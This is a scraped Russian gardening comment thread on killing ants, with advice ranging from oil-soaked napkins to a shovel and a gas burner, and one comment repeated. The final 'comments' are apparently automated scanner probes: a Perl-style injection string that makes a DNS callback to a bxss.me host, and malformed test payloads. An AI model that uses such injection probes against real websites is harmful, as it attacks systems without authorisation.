Гость 020769
Все это порожняк!!! Круче и эффективнее чем лопата и газгорелка все-таки нет!!! Остальное чепуха Можно еще попробовать этот ловчий пояс только вот клей нужно такой как на мухловушках раздобыть
Гость258776
Гость258410
Большей чуши я еще не читал, особенно по поводу растительного масла. Раскладываю салфетки пропитанные маслом вблизи муравейников и они как наркоманы сползаются и жрут это масло покрывая салфетки. Затем газовая горелка . Сода , бананы. Автор не смеши. Берешь лопату, вскрываешь гнезда с расплодом личинок и опять газовая горелка. И не будут они жрать твою буру и никуда не денутся от аммиака. После аммиака через два три дня он и опять будут живее всех живых. Так что только лопата и газовая горелка. И то приходится повторять эту операцию пару раз , так как часть из них в разброде на охоте.
Надо попро бовать
Гость258410
Рвы с водой и чеснок. А может сразу противотанковые? У меня муравейник и не один прямо в грядке с чесноком и им это абсолютно фиолетово.К сожалению чеснок перекопать не могу пока не созреет, а потом опять газовая горелка.
Гость258410
Большей чуши я еще не читал, особенно по поводу растительного масла. Раскладываю салфетки пропитанные маслом вблизи муравейников и они как наркоманы сползаются и жрут это масло покрывая салфетки. Затем газовая горелка . Сода , бананы. Автор не смеши. Берешь лопату, вскрываешь гнезда с расплодом личинок и опять газовая горелка. И не будут они жрать твою буру и никуда не денутся от аммиака. После аммиака через два три дня он и опять будут живее всех живых. Так что только лопата и газовая горелка. И то приходится повторять эту операцию пару раз , так как часть из них в разброде на охоте.
�'�9878149
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
".gethostbyname(lc("hitzd"."swtcajig6ed7d.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(88).chr(121).chr(77)."
555
'"()&%n2N3(9525)
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
<цензура>
1 2 3 4 7 Следующая